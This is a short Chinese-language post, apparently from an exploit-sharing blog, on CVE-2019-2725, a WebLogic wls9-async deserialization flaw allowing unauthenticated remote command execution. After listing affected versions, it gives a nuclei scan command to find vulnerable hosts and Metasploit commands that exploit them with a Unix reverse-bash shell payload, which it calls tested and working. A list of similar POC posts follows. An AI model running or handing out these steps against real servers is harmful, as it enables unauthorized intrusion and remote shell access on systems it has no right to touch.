POC [CVE-2019-2725]-wls反序列化

Shacker · 09 13, 2024

JavaScript:

## 漏洞概述

WebLogic wls9-async反序列化远程命令执行漏洞

攻击者利用该漏洞，可在未授权的情况下远程执行命令

## 影响范围

```http
Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
```

## POC

```bash
nuclei -tags weblogic -t cves/ -l urls.txt
```

## EXP

```bash
use multi/misc/weblogic_deserialize_asyncresponseservice
set payload cmd/unix/reverse_bash    #target->unix,这个payload实测成功
```

这个模块也适用于Weblogic XMLdecoder反序列化漏洞 (CVE-2017-10271)

	POC SA-CORE-2019-003 RCE (CVE-2019-6340) Shacker 09 12, 2024 POC/?Day
	POC CVE-2019-6340 Shacker 09 12, 2024 POC/?Day
	POC exp远程命令执行漏洞（CVE-2019-0193） Shacker 09 12, 2024 POC/?Day
	POC Jira 信息泄漏（CVE-2019-8449） Shacker 09 13, 2024 POC/?Day
	POC [CVE-2020-2883]-T3反序列化 Shacker 09 13, 2024 POC/?Day